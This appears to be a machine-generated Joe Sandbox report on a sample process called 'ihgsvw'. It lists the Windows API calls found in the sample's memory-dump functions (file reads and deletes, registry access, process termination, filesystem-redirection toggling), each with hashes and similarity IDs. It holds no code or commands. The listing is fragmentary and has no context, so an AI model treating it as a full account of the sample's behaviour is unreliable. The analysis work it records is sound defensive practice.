                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Variant$ClearCopy$AllocInitString
                • String ID:
                • API String ID: 3859894641-0
                • Opcode ID: 5252530477b74dc1a9f31524cd20053de53e58b934e94c5230c0063ef5ab31fa
                • Instruction ID: f16d8fb46782f52642d7a550a248da044d6b52b68d5f139c6fe476b314f43949
                • Opcode Fuzzy Hash: 5252530477b74dc1a9f31524cd20053de53e58b934e94c5230c0063ef5ab31fa
                • Instruction Fuzzy Hash: B951E231654310EBCF24AB659895B2DB3E8EF06310F35804AF906DF2D6EB709C40CB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C110C8
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C11103
                • EnterCriticalSection.KERNEL32(?), ref: 00C1111F
                • LeaveCriticalSection.KERNEL32(?), ref: 00C11198
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C111AF
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C111DD
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                • String ID:
                • API String ID: 3368777196-0
                • Opcode ID: 74fa88ed494ffcf7ac621055c8208c605c3f3119b26a07c87e47582517635031
                • Instruction ID: 48d014eedfc1e5c38ad97c28b79aeee917ac2591eef03ed06bbde4985b290a7d
                • Opcode Fuzzy Hash: 74fa88ed494ffcf7ac621055c8208c605c3f3119b26a07c87e47582517635031
                • Instruction Fuzzy Hash: E3416C71910205EBDF04AF54DC85BAEB7B8FF45310B1880A9FE00AA256D774DE61DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                • _wcslen.LIBCMT ref: 00C161D5
                • CoInitialize.OLE32(00000000), ref: 00C162EF
                • CoCreateInstance.OLE32(00C40CC4,00000000,00000001,00C40B34,?), ref: 00C16308
                • CoUninitialize.OLE32 ref: 00C16326
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 3172280962-24824748
                • Opcode ID: 4057d70f82f6099f260558c65cc5f2794a9a495673168c606bf991a4eecf3ebe
                • Instruction ID: 905742885606298e0c8b4e0ae7aebc647a5477f233d9215d585f5b42e90abc04
                • Opcode Fuzzy Hash: 4057d70f82f6099f260558c65cc5f2794a9a495673168c606bf991a4eecf3ebe
                • Instruction Fuzzy Hash: 7FD13571A082119FC714DF24C484A6ABBF5FF8A714F14889DF8969B361CB31ED85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,00000000,00BC4D73,00000000,?,?,00BC6902,?,?,00000000), ref: 00BD3108
                • _free.LIBCMT ref: 00BD313B
                • _free.LIBCMT ref: 00BD3163
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD3170
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD317C
                • _abort.LIBCMT ref: 00BD3182
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 8da7f9d36ab7a7cc16fddd24e91e89fb85241d026b8f75e875b6303ec1e7251f
                • Instruction ID: 8301c53e80a8e9b0f1ea9e46327891b9ab70e400978e794920c93550bce3d142
                • Opcode Fuzzy Hash: 8da7f9d36ab7a7cc16fddd24e91e89fb85241d026b8f75e875b6303ec1e7251f
                • Instruction Fuzzy Hash: 4DF02D3250490266C22223357C0AB1EA6F5DFD5F70F2444A7F415E23E3FFA08E014163
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA1ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1F33
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F42
                  • Part of subcall function 00BA1ED9: BeginPath.GDI32(?), ref: 00BA1F59
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F82
                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C393AD
                • LineTo.GDI32(?,00000003,00000000), ref: 00C393C1
                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C393CF
                • LineTo.GDI32(?,00000000,00000003), ref: 00C393DF
                • EndPath.GDI32(?), ref: 00C393EF
                • StrokePath.GDI32(?), ref: 00C393FF
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                • String ID:
                • API String ID: 43455801-0
                • Opcode ID: 58a62619126d24fe527e264aebbd2daf2302d21cdd734bceb0c32dbf35f13ac5
                • Instruction ID: 22b1ef84065e32e1b8532f752f65cf255663ea967721dcb84e6f1587d080e506
                • Opcode Fuzzy Hash: 58a62619126d24fe527e264aebbd2daf2302d21cdd734bceb0c32dbf35f13ac5
                • Instruction Fuzzy Hash: 7711DB7200010DBFDF129F95EC88F9E7FADEB08354F048051BA1A5A1A1D7719E55DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA3236
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA323E
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA3249
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA3254
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA325C
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA3264
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: bdbae3ac2d07373f9748634216da9dcd5a0241293ee2a3933fc0a795ff4a80bb
                • Instruction ID: 79ea7669d77da966c26e6f274e8683b6a49c5db529907e1f89cb22433465c3e2
                • Opcode Fuzzy Hash: bdbae3ac2d07373f9748634216da9dcd5a0241293ee2a3933fc0a795ff4a80bb
                • Instruction Fuzzy Hash: 8C0148B0901B597DE3008F5A8C85B56FFA8FF19354F00411BA15C47941C7B5A864CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C0F35C
                • SendMessageTimeoutW.USER32 ref: 00C0F372
                • GetWindowThreadProcessId.USER32(?,?), ref: 00C0F381
                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0F390
                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0F39A
                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0F3A1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                • String ID:
                • API String ID: 839392675-0
                • Opcode ID: 249c7c285f913a0d2b7b018dc4a6cdf973623b994a7ea61e50cd7db7c8255b8e
                • Instruction ID: d0752a2588477cad1d6bbfd13214b09c7feba7c8dcb1b031b591ef5f56b1006e
                • Opcode Fuzzy Hash: 249c7c285f913a0d2b7b018dc4a6cdf973623b994a7ea61e50cd7db7c8255b8e
                • Instruction Fuzzy Hash: 89F05E32251158BBE7215B62AC0EFEF3F7CEFC6B21F000058F612E2090D7A06A42D6B5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetClientRect.USER32 ref: 00BE34B3
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BE34CA
                • GetWindowDC.USER32(?), ref: 00BE34D6
                • GetPixel.GDI32(00000000,?,?), ref: 00BE34E5
                • ReleaseDC.USER32 ref: 00BE34F7
                • GetSysColor.USER32(00000005), ref: 00BE3511
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                • String ID:
                • API String ID: 272304278-0
                • Opcode ID: cd6f0a0db8a09c159a637b2ee2190d50a7f15cbfd6cd90592cb7c03737f6d151
                • Instruction ID: 1a90554918d7ae842c4ecfd29d75d9748eb3d33954faee6ed48dfd3fd2fa7093
                • Opcode Fuzzy Hash: cd6f0a0db8a09c159a637b2ee2190d50a7f15cbfd6cd90592cb7c03737f6d151
                • Instruction Fuzzy Hash: C0015671510209EFDB119F60EC48BEE7BF5FF04321F5101A4F916A22A1CB310E51AF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C0210F
                • UnloadUserProfile.USERENV(?,?), ref: 00C0211B
                • CloseHandle.KERNEL32(?), ref: 00C02124
                • CloseHandle.KERNEL32(?), ref: 00C0212C
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C02135
                • HeapFree.KERNEL32(00000000), ref: 00C0213C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C026F6
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C02709
                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C02739
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: MessageSend$_wcslen$ClassName
                • String ID: ComboBox$ListBox
                • API String ID: 2081771294-1403004172
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC50AE,?,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002), ref: 00BC511D
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC5130
                • FreeLibrary.KERNEL32(00000000,?,?,?,00BC50AE,?,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002,00000000), ref: 00BC5153
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA633E
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA6350
                • FreeLibrary.KERNEL32(00000000,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6362
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-3689287502
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6304
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA6316
                • FreeLibrary.KERNEL32(00000000,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6329
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-1355242751
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C134D9
                • DeleteFileW.KERNEL32(?), ref: 00C1355B
                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C13571
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C13582
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C13594
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: File$Delete$Copy
                • String ID:
                • API String ID: 3226157194-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C2D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2C00D,?,?), ref: 00C2D314
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D350
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3C7
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3FD
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C404
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2C45F
                • RegEnumKeyExW.ADVAPI32 ref: 00C2C4C2
                • RegCloseKey.ADVAPI32(?,?), ref: 00C2C505
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2C512
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                • String ID:
                • API String ID: 826366716-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32 ref: 00C37592
                • SetWindowLongW.USER32 ref: 00C375A9
                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C375D2
                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C1B4D6,00000000,00000000), ref: 00C375F7
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C37626
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Window$Long$MessageSendShow
                • String ID:
                • API String ID: 3688381893-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetInputState.USER32 ref: 00C14225
                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C1427C
                • TranslateMessage.USER32(?), ref: 00C142A5
                • DispatchMessageW.USER32 ref: 00C142AF
                • PeekMessageW.USER32 ref: 00C142C0
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                • String ID:
                • API String ID: 2256411358-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowRect.USER32 ref: 00C021A5
                • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C02251
                • Sleep.KERNEL32(00000000,?,?,?), ref: 00C02259
                • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C0226A
                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C02272
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: MessagePostSleep$RectWindow
                • String ID:
                • API String ID: 3382505437-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C360A4
                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C360FC
                • _wcslen.LIBCMT ref: 00C3610E
                • _wcslen.LIBCMT ref: 00C36119
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C36175
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: MessageSend$_wcslen
                • String ID:
                • API String ID: 763830540-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Window$ForegroundPixelRelease
                • String ID:
                • API String ID: 4156661090-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 00BDD166
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDD189
                  • Part of subcall function 00BD3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC6A99,?,0000015D,?,?,?,?,00BC85D0,000000FF,00000000,?,?), ref: 00BD3BE2
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDD1AF
                • _free.LIBCMT ref: 00BDD1C2
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDD1D1
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(0000000A,?,?,00BCF66E,00BC547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00BD318D
                • _free.LIBCMT ref: 00BD31C2
                • _free.LIBCMT ref: 00BD31E9
                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00BD31F6
                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00BD31FF
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • QueryPerformanceCounter.KERNEL32(?), ref: 00C0F1C3
                • QueryPerformanceFrequency.KERNEL32(?), ref: 00C0F1D1
                • Sleep.KERNEL32(00000000), ref: 00C0F1D9
                • QueryPerformanceCounter.KERNEL32(?), ref: 00C0F1E3
                • Sleep.KERNEL32 ref: 00C0F21F
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?,?,00C00BEE), ref: 00C008BB
                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?), ref: 00C008D6
                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?), ref: 00C008E4
                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?), ref: 00C008F4
                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C007D1,80070057,?,?), ref: 00C00900
                Similarity
                • API ID: From$Prog$FreeStringTasklstrcmpi
                • String ID:
                • API String ID: 3897988419-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00BD264E
                  • Part of subcall function 00BD2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4), ref: 00BD2D6E
                  • Part of subcall function 00BD2D58: GetLastError.KERNEL32(00C71DC4,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4,00C71DC4), ref: 00BD2D80
                • _free.LIBCMT ref: 00BD2660
                • _free.LIBCMT ref: 00BD2673
                • _free.LIBCMT ref: 00BD2684
                • _free.LIBCMT ref: 00BD2695
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: __freea$_free
                • String ID: a/p$am/pm
                • API String ID: 3432400110-3206640213
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C3489F
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C348B3
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C348D7
                Strings
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C3419F
                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C341AF
